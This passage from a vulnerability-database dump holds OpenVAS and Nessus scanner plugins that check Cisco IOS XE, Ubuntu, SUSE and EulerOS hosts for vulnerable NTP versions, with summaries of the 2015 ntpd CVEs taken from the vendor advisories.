\"CVE-2015-7851\", \"CVE-2015-7852\",\n \"CVE-2015-7853\", \"CVE-2015-7854\", \"CVE-2015-7871\", \"CVE-2015-7704\", \"CVE-2015-7705\", \"CVE-2015-7703\",\n \"CVE-2015-7701\", \"CVE-2015-7855\", \"CVE-2015-7691\", \"CVE-2015-7692\", \"CVE-2015-7702\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2020-06-23T09:25:46+0000\");\n\n script_name(\"Multiple Vulnerabilities in ntpd Affecting Cisco Products - October 2015\");\n\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151021-ntp\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAlert.x?alertId=41653\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAlert.x?alertId=41658\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n script_tag(name:\"summary\", value:\"Multiple Cisco products incorporate a version of the ntpd package.\n Versions of this package are affected by one or more vulnerabilities that could allow an unauthenticated,\n remote attacker to create a denial of service (DoS) condition or modify the time being advertised by a\n device acting as a network time protocol (NTP) server.\n\n On October 21st, 2015, NTP.org released a security advisory detailing 13 issues regarding multiple DoS\n vulnerabilities, information disclosure vulnerabilities, and logic issues that may result in an attacker\n gaining the ability to modify an NTP server's advertised time. The vulnerabilities covered in this document are as follows:\n\n - CVE-2015-7691 - Denial of Service AutoKey Malicious Message\n\n - CVE-2015-7692 - Denial of Service AutoKey Malicious Message\n\n - CVE-2015-7701 - Denial of Service CRYPTO_ASSOC Memory Leak\n\n - CVE-2015-7702 - Denial of Service AutoKey Malicious Message\n\n - CVE-2015-7703 - Configuration Directive File Overwrite Vulnerability\n\n - CVE-2015-7704 - Denial of Service by Spoofed Kiss-o'-Death\n\n - CVE-2015-7705 - Denial of Service by Priming the Pump\n\n - CVE-2015-7848 - Network Time Protocol ntpd Multiple Integer Overflow Read Access Violations\n\n - CVE-2015-7849 - Network Time Protocol Trusted Keys Memory Corruption Vulnerability\n\n - CVE-2015-7850 - Network Time Protocol Remote Configuration Denial of Service Vulnerability\n\n - CVE-2015-7851 - Network Time Protocol ntpd saveconfig Directory Traversal Vulnerability\n\n - CVE-2015-7852 - Network Time Protocol ntpq atoascii Memory Corruption Vulnerability\n\n - CVE-2015-7853 - Network Time Protocol Reference Clock Memory Corruption Vulnerability\n\n - CVE-2015-7854 - Network Time Protocol Password Length Memory Corruption Vulnerability\n\n - CVE-2015-7855 - Denial of Service Long Control Packet Message\n\n - CVE-2015-7871 - NAK to the Future: NTP Symmetric Association Authentication Bypass Vulnerability\n\n Cisco will release software updates that address these vulnerabilities.\n\n Workarounds that mitigate one or more of the vulnerabilities may be available for certain products, please see the individual Cisco Bug IDs for details.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-06-23 09:25:46 +0000 (Tue, 23 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-09 18:22:34 +0200 (Mon, 09 May 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_ios_xe_version.nasl\");\n script_mandatory_keys(\"cisco_ios_xe/version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) ) exit( 0 );\n\naffected = make_list(\n '2.1.0',\n '2.1.1',\n '2.1.2',\n '2.2.1',\n '2.2.2',\n '2.2.3',\n '2.3.0',\n '2.3.0t',\n '2.3.1t',\n '2.3.2',\n '2.4.0',\n '2.4.1',\n '2.5.0',\n '2.5.1',\n '2.5.2',\n '2.6.0',\n '2.6.1',\n '2.6.2',\n '3.1.0S',\n '3.1.1S',\n '3.1.2S',\n '3.1.3S',\n '3.1.4S',\n '3.1.5S',\n '3.1.6S',\n '3.1.0SG',\n '3.1.1SG',\n '3.2.0S',\n '3.2.1S',\n '3.2.2S',\n '3.2.3S',\n '3.2.0SE',\n '3.2.1SE',\n '3.2.2SE',\n '3.2.3SE',\n '3.2.0SG',\n '3.2.1SG',\n '3.2.2SG',\n '3.2.3SG',\n '3.2.4SG',\n '3.2.5SG',\n '3.2.6SG',\n '3.2.7SG',\n '3.2.8SG',\n '3.2.9SG',\n '3.2.0XO',\n '3.2.1XO',\n '3.3.0S',\n '3.3.1S',\n '3.3.2S',\n '3.3.0SE',\n '3.3.1SE',\n '3.3.2SE',\n '3.3.3SE',\n '3.3.4SE',\n '3.3.5SE',\n '3.3.0SG',\n '3.3.1SG',\n '3.3.2SG',\n '3.3.0SQ',\n '3.3.1SQ',\n '3.3.0XO',\n '3.3.1XO',\n '3.3.2XO',\n '3.4.0S',\n '3.4.1S',\n '3.4.2S',\n '3.4.3S',\n '3.4.4S',\n '3.4.5S',\n '3.4.6S',\n '3.4.0SG',\n '3.4.1SG',\n '3.4.2SG',\n '3.4.3SG',\n '3.4.4SG',\n '3.4.5SG',\n '3.4.0SQ',\n '3.4.1SQ',\n '3.5.0E',\n '3.5.1E',\n '3.5.2E',\n '3.5.3E',\n '3.5.0S',\n '3.5.1S',\n '3.5.2S',\n '3.6.0E',\n '3.6.1E',\n '3.6.0S',\n '3.6.1S',\n '3.6.2S',\n '3.7.0E',\n '3.7.0S',\n '3.7.1S',\n '3.7.2S',\n '3.7.3S',\n '3.7.4S',\n '3.7.5S',\n '3.7.6S',\n '3.7.7S',\n '3.8.0S',\n '3.8.1S',\n '3.8.2S',\n '3.9.0S',\n '3.9.1S',\n '3.9.2S',\n '3.10.0S',\n '3.10.0S',\n '3.10.1S',\n '3.10.2S',\n '3.10.3S',\n '3.10.4S',\n '3.10.5S',\n '3.10.6S',\n '3.11.0S',\n '3.11.1S',\n '3.11.2S',\n '3.11.3S',\n '3.11.4S',\n '3.12.0S',\n '3.12.1S',\n '3.12.2S',\n '3.12.3S',\n '3.13.0S',\n '3.13.1S',\n '3.13.2S',\n '3.14.0S',\n '3.14.1S',\n '3.14.2S',\n '3.14.3S',\n '3.14.4S',\n '3.15.0S' );\n\nforeach af ( affected )\n{\n if( version == af )\n {\n report = report_fixed_ver( installed_version:version, fixed_version: \"See advisory\" );\n security_message( port:0, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-24T19:54:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7703", "CVE-2015-7855", "CVE-2015-5146", "CVE-2015-5219", "CVE-2015-7704", "CVE-2015-7701", "CVE-2015-7692", "CVE-2015-7702", "CVE-2015-5194", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7691", "CVE-2015-7705", "CVE-2015-5300", "CVE-2015-5195", "CVE-2015-7850", "CVE-2015-7853"], "description": "The remote host is missing an update for the ", "modified": "2020-06-23T00:00:00", "published": "2015-10-28T00:00:00", "id": "OPENVAS:1361412562310842504", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842504", "type": "openvas", "title": "Ubuntu Update for ntp USN-2783-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for ntp USN-2783-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842504\");\n script_version(\"2020-06-23T09:25:46+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-23 09:25:46 +0000 (Tue, 23 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-28 07:18:08 +0100 (Wed, 28 Oct 2015)\");\n script_cve_id(\"CVE-2015-5146\", \"CVE-2015-5194\", \"CVE-2015-5195\", \"CVE-2015-7703\", \"CVE-2015-5219\",\n \"CVE-2015-5300\", \"CVE-2015-7691\", \"CVE-2015-7692\", \"CVE-2015-7702\", \"CVE-2015-7701\",\n \"CVE-2015-7704\", \"CVE-2015-7705\", \"CVE-2015-7850\", \"CVE-2015-7852\", \"CVE-2015-7853\",\n \"CVE-2015-7855\", \"CVE-2015-7871\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for ntp USN-2783-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Aleksis Kauppinen discovered that NTP\nincorrectly handled certain remote config packets. In a non-default configuration,\na remote authenticated attacker could possibly use this issue to cause NTP to crash,\nresulting in a denial of service. (CVE-2015-5146)\n\nMiroslav Lichvar discovered that NTP incorrectly handled logconfig\ndirectives. In a non-default configuration, a remote authenticated attacker\ncould possibly use this issue to cause NTP to crash, resulting in a denial\nof service. (CVE-2015-5194)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain statistics\ntypes. In a non-default configuration, a remote authenticated attacker\ncould possibly use this issue to cause NTP to crash, resulting in a denial\nof service. (CVE-2015-5195)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain file\npaths. In a non-default configuration, a remote authenticated attacker\ncould possibly use this issue to cause NTP to crash, resulting in a denial\nof service, or overwrite certain files. (CVE-2015-7703)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain packets.\nA remote attacker could possibly use this issue to cause NTP to hang,\nresulting in a denial of service. (CVE-2015-5219)\n\nAanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP\nincorrectly handled restarting after hitting a panic threshold. A remote\nattacker could possibly use this issue to alter the system time on clients.\n(CVE-2015-5300)\n\nIt was discovered that NTP incorrectly handled autokey data packets. A\nremote attacker could possibly use this issue to cause NTP to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-7691, CVE-2015-7692, CVE-2015-7702)\n\nIt was discovered that NTP incorrectly handled memory when processing\ncertain autokey messages. A remote attacker could possibly use this issue\nto cause NTP to consume memory, resulting in a denial of service.\n(CVE-2015-7701)\n\nAanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP\nincorrectly handled rate limiting. A remote attacker could possibly use\nthis issue to cause clients to stop updating their clock. (CVE-2015-7704,\nCVE-2015-7705)\n\nYves Younan discovered that NTP incorrectly handled logfile and keyfile\ndirectives. In a non-default configuration, a remote authenticated attacker\ncould possibly use this issue to cause NTP to enter a loop, resulting in a\ndenial of service. (CVE-2015-7850)\n\nYves Younan and Aleksander Nikolich discovered that NTP incorrectly handled\nascii conversion. A remote attacker could possibly ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"ntp on Ubuntu 15.10, Ubuntu 15.04, Ubuntu 14.04 LTS, Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2783-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2783-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(15\\.04|14\\.04 LTS|12\\.04 LTS|15\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.6.p5+dfsg-3ubuntu6.2\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.6.p5+dfsg-3ubuntu2.14.04.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.6.p3+dfsg-1ubuntu3.6\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.6.p5+dfsg-3ubuntu8.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-24T19:49:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7703", "CVE-2015-8140", "CVE-2015-8138", "CVE-2015-7855", "CVE-2015-7973", "CVE-2015-7977", "CVE-2015-8158", "CVE-2015-7704", "CVE-2015-7979", "CVE-2015-7701", "CVE-2015-7976", "CVE-2015-7848", "CVE-2015-8139", "CVE-2015-7975", "CVE-2015-7692", "CVE-2015-7851", "CVE-2015-7702", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7849", "CVE-2015-7691", "CVE-2015-7705", "CVE-2015-5300", "CVE-2015-7974", "CVE-2015-7850", "CVE-2015-7854", "CVE-2015-7978", "CVE-2015-7853"], "description": "The remote host is missing an update for the ", "modified": "2020-06-23T00:00:00", "published": "2016-05-07T00:00:00", "id": "OPENVAS:1361412562310851300", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851300", "type": "openvas", "title": "SUSE: Security Advisory for ntp (SUSE-SU-2016:1247-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851300\");\n script_version(\"2020-06-23T09:25:46+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-23 09:25:46 +0000 (Tue, 23 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-07 05:19:24 +0200 (Sat, 07 May 2016)\");\n script_cve_id(\"CVE-2015-5300\", \"CVE-2015-7691\", \"CVE-2015-7692\", \"CVE-2015-7701\",\n \"CVE-2015-7702\", \"CVE-2015-7703\", \"CVE-2015-7704\", \"CVE-2015-7705\",\n \"CVE-2015-7848\", \"CVE-2015-7849\", \"CVE-2015-7850\", \"CVE-2015-7851\",\n \"CVE-2015-7852\", \"CVE-2015-7853\", \"CVE-2015-7854\", \"CVE-2015-7855\",\n \"CVE-2015-7871\", \"CVE-2015-7973\", \"CVE-2015-7974\", \"CVE-2015-7975\",\n \"CVE-2015-7976\", \"CVE-2015-7977\", \"CVE-2015-7978\", \"CVE-2015-7979\",\n \"CVE-2015-8138\", \"CVE-2015-8139\", \"CVE-2015-8140\", \"CVE-2015-8158\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for ntp (SUSE-SU-2016:1247-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"ntp was updated to version 4.2.8p6 to fix 28 security issues.\n\n Major functional changes:\n\n - The 'sntp' commandline tool changed its option handling in a major way,\n some options have been renamed or dropped.\n\n - 'controlkey 1' is added during update to ntp.conf to allow sntp to work.\n\n - The local clock is being disabled during update.\n\n - ntpd is no longer running chrooted.\n\n Other functional changes:\n\n - ntp-signd is installed.\n\n - 'enable mode7' can be added to the configuration to allow ntdpc to work\n as compatibility mode option.\n\n - 'kod' was removed from the default restrictions.\n\n - SHA1 keys are used by default instead of MD5 keys.\n\n Also yast2-ntp-client was updated to match some sntp syntax changes.\n (bsc#937837)\n\n These security issues were fixed:\n\n - CVE-2015-8158: Fixed potential infinite loop in ntpq (bsc#962966).\n\n - CVE-2015-8138: Zero Origin Timestamp Bypass (bsc#963002).\n\n - CVE-2015-7979: Off-path Denial of Service (DoS) attack on authenticated\n broadcast mode (bsc#962784).\n\n - CVE-2015-7978: Stack exhaustion in recursive traversal of restriction\n list (bsc#963000).\n\n - CVE-2015-7977: reslist NULL pointer dereference (bsc#962970).\n\n - CVE-2015-7976: ntpq saveconfig command allows dangerous characters in\n filenames (bsc#962802).\n\n - CVE-2015-7975: nextvar() missing length check (bsc#962988).\n\n - CVE-2015-7974: Skeleton Key: Missing key check allows impersonation\n between authenticated peers (bsc#962960).\n\n - CVE-2015-7973: Replay attack on authenticated broadcast mode\n (bsc#962995).\n\n - CVE-2015-8140: ntpq vulnerable to replay attacks (bsc#962994).\n\n - CVE-2015-8139: Origin Leak: ntpq and ntpdc, disclose origin (bsc#962997).\n\n - CVE-2015-5300: MITM attacker could have forced ntpd to make a step\n larger than the panic threshold (bsc#951629).\n\n - CVE-2015-7871: NAK to the Future: Symmetric association authentication\n bypass via crypto-NAK (bsc#951608).\n\n - CVE-2015-7855: decodenetnum() will ASSERT botch instead of returning\n FAIL on some bogus values (bsc#951608).\n\n - CVE-2015-7854: Password Length Memory Corruption Vulnerability\n (bsc#951608).\n\n - CVE-2015-7853: Invalid length data provided by a custom refclock driver\n could cause a buffer overflow (bsc#951608).\n\n - CVE-2015-7852: ntpq atoascii() Memory Corruption Vulnerability\n (bsc#951608).\n\n - CVE-2015-7851: saveconfig Directory Traversal Vulnerability (bsc#951608).\n\n - CVE-2015-7850: remote config logfile-keyfile (bsc#951608).\n\n - CVE-2015-7849: trusted key use-after-free (bsc#951608).\n\n - CVE-2015-7848: mode 7 loop counter underrun (bsc#951608).\n\n - ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"ntp on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:1247-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"yast2-ntp-client\", rpm:\"yast2-ntp-client~3.1.12.4~8.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.8p6~46.5.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp-debuginfo\", rpm:\"ntp-debuginfo~4.2.8p6~46.5.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp-debugsource\", rpm:\"ntp-debugsource~4.2.8p6~46.5.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp-doc\", rpm:\"ntp-doc~4.2.8p6~46.5.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.8p6~46.5.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp-debuginfo\", rpm:\"ntp-debuginfo~4.2.8p6~46.5.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp-debugsource\", rpm:\"ntp-debugsource~4.2.8p6~46.5.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp-doc\", rpm:\"ntp-doc~4.2.8p6~46.5.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"yast2-ntp-client\", rpm:\"yast2-ntp-client~3.1.12.4~8.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-07T08:58:54", "description": "According to the versions of the ntp packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - The rate limiting feature in NTP 4.x before 4.2.8p4 and\n 4.3.x before 4.3.77 allows remote attackers to have\n unspecified impact via a large number of crafted\n requests.\n\n - Mitigation:Do not add the 'limited' configuration\n option to any restrict lines in the ntp.conf\n file.(CVE-2015-7705)\n\n - The protocol engine in ntp 4.2.6 before 4.2.8p11 allows\n a remote attackers to cause a denial of service\n (disruption) by continually sending a packet with a\n zero-origin timestamp and source IP address of the\n 'other side' of an interleaved association causing the\n victim ntpd to reset its association(CVE-2018-7185)\n\n - The ntpq saveconfig command in NTP 4.1.2, 4.2.x before\n 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not\n properly filter special characters, which allows\n attackers to cause unspecified impact via a crafted\n filename.(CVE-2015-7976)\n\n - ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before\n 4.3.77 allows remote authenticated users to cause a\n denial of service (infinite loop or crash) by pointing\n the key file at the log file.\n\n - Mitigation:Disable NTP remote configuration or limit\n this feature to trusted users to effectively mitigate\n this risk(CVE-2015-7850)\n\n - The datalen parameter in the refclock driver in NTP\n 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows\n remote attackers to execute arbitrary code or cause a\n denial of service (crash) via a negative input\n value.(CVE-2015-7853)\n\n - Crypto-NAK packets in ntpd in NTP 4.2.x before 4.2.8p4,\n and 4.3.x before 4.3.77 allows remote attackers to\n bypass authentication.(CVE-2015-7871)\n\n - The decodenetnum function in ntpd in NTP 4.2.x before\n 4.2.8p4, and 4.3.x before 4.3.77 allows remote\n attackers to cause a denial of service (assertion\n failure) via a 6 or mode 7 packet containing a long\n data value.(CVE-2015-7855)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-07-22T00:00:00", "title": "EulerOS 2.0 SP2 : ntp (EulerOS-SA-2019-1719)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7855", "CVE-2018-7185", "CVE-2015-7976", "CVE-2015-7871", "CVE-2015-7705", "CVE-2015-7850", "CVE-2015-7853"], "modified": "2019-07-22T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ntpdate", "p-cpe:/a:huawei:euleros:ntp", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-1719.NASL", "href": "https://www.tenable.com/plugins/nessus/126847", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(126847);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2015-7705\",\n \"CVE-2015-7850\",\n \"CVE-2015-7853\",\n \"CVE-2015-7855\",\n \"CVE-2015-7871\",\n \"CVE-2015-7976\",\n \"CVE-2018-7185\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : ntp (EulerOS-SA-2019-1719)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ntp packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - The rate limiting feature in NTP 4.x before 4.2.8p4 and\n 4.3.x before 4.3.77 allows remote attackers to have\n unspecified impact via a large number of crafted\n requests.\n\n - Mitigation:Do not add the 'limited' configuration\n option to any restrict lines in the ntp.conf\n file.(CVE-2015-7705)\n\n - The protocol engine in ntp 4.2.6 before 4.2.8p11 allows\n a remote attackers to cause a denial of service\n (disruption) by continually sending a packet with a\n zero-origin timestamp and source IP address of the\n 'other side' of an interleaved association causing the\n victim ntpd to reset its association(CVE-2018-7185)\n\n - The ntpq saveconfig command in NTP 4.1.2, 4.2.x before\n 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not\n properly filter special characters, which allows\n attackers to cause unspecified impact via a crafted\n filename.(CVE-2015-7976)\n\n - ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before\n 4.3.77 allows remote authenticated users to cause a\n denial of service (infinite loop or crash) by pointing\n the key file at the log file.\n\n - Mitigation:Disable NTP remote configuration or limit\n this feature to trusted users to effectively mitigate\n this risk(CVE-2015-7850)\n\n - The datalen parameter in the refclock driver in NTP\n 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows\n remote attackers to execute arbitrary code or cause a\n denial of service (crash) via a negative input\n value.(CVE-2015-7853)\n\n - Crypto-NAK packets in ntpd in NTP 4.2.x before 4.2.8p4,\n and 4.3.x before 4.3.77 allows remote attackers to\n bypass authentication.(CVE-2015-7871)\n\n - The decodenetnum function in ntpd in NTP 4.2.x before\n 4.2.8p4, and 4.3.x before 4.3.77 allows remote\n attackers to cause a denial of service (assertion\n failure) via a 6 or mode 7 packet containing a long\n data value.(CVE-2015-7855)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1719\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?723c3420\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntp\");\n 